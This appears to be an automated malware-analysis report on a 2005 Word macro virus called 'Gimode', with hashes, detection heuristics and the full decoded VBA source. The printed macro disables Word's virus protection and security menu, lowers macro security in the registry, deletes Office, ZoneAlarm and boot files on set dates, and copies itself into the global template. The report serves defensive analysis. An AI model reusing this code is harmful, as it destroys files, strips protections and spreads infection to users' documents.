Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ed91b2296226b4ed…

MALICIOUS

Office (OLE)

49.0 KB Created: 2005-01-20 15:46:00 Authoring application: Microsoft Office Word First seen: 2012-06-14
MD5: 6cf781e14d35b9e90491026cdba5e576 SHA-1: c2df65c6462f5af63e2ebb3a991d9a84aa60ef7c SHA-256: ed91b2296226b4edd5f4590b095bc193e172351a944d4dc31d71e9035b441b0c
196 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as a legacy WordBasic macro virus, specifically 'Gimode' from 2005, which is also detected by ClamAV as Win.Trojan.Psycho-3. The AutoOpen macro attempts to display a fake error message to the user and writes an HTML file named 'Omedi.html' to C:\WINDOWS\. This indicates a malicious document designed to deceive the user and potentially drop further malicious content.

Heuristics 6

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5366 bytes
SHA-256: 73963c3d0a171b5dfdedb30cfe861e6f184b778e92658617a174fbee1494f3db
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Gimode"

'Macro virus name: Gimode
'Infecta documentos word.
'Infect word documents.
'<><><><><><><><><><><><>
'=========================
'Year 2005 - Brasil
'-------------------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Word macro virus Gimode"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Gimode.AutoOpen"
On Error Resume Next
MsgBox " Seu computador esta com defeito!!", vbOKOnly + vbCritical, "Virus informa !!"
Open "C:\WINDOWS\Omedi.html" For Output As #1
 Print #1, "<html><head><title>Virus aqui!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
 Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='70%'>Virus esta animado!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Este desktop esta muito bonito!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = "C:\WINDOWS\Omedi.html"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "WebRed") = "Virus ativado" ' Add the value to the registry key
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range
            .Font.Size = 24
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Text = "Paz em todo o mundo"
        End With

If Day(Now()) = 7 Or (Day(Now)) = 14 Or (Day(Now)) = 21 Or (Day(Now)) = 28 Then
MsgBox " Office nгo existe !!", vbOKOnly + vbCritical, "Virus alerta!!"
WordBasic.Kill "C:\Program Files\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Windows\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Arquivos de programas\Microsoft Office\Office\*.*"

If Day(Now()) = 8 Or (Day(Now)) = 15 Or (Day(Now)) = 22 Or (Day(Now)) = 29 Then
MsgBox "Arquivos importantes foram deletados !!", vbOKOnly + vbCritical, "Virus esclarece!!"
WordBasic.Kill "C:\AutoExec.bat"
WordBasic.Kill "C:\Command.com"
WordBasic.Kill "C:\Config.sys"
    
End If
End If
End Sub
 
Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Word macro virus Gimode"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Gimode.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
      
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Word macro virus Gimode"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Gimode.AutoClose"
    
On Error Resume Next

MsgBox "ZoneAlarm apagado !!", vbOKOnly + vbCritical, "Virus responde !!"

WordBasic.Kill "C:\Program Files\Zone Labs\ZoneAlarm\*.*"
WordBasic.Kill "C:\Windows\ZoneLabs\ZoneAlarm\*.*"
WordBasic.Kill "C:\ZoneLabs\ZoneAlarm\*.*"
WordBasic.Kill "C:\Zonealarm.exe"
WordBasic.Kill "C:\Arquivos de programas\Zone Labs\ZoneAlarm\*.*"

ActiveDocument.SaveAs FileName:="C:\Edi.doc"
ActiveDocument.Saved = True

iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Gimode" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Gimode" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Gimode"
    WordBasic.MacroCopy sMacro$, "Global:Gimode"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Gimode"
    
End If
End Sub

'Infecta documentos word.
'Infect word documents.
'<><><><><><><><><><><><>
'=========================
'Year 2005 - Brasil
'-------------------------

Open this report in the interactive analyzer, or submit your own file for analysis.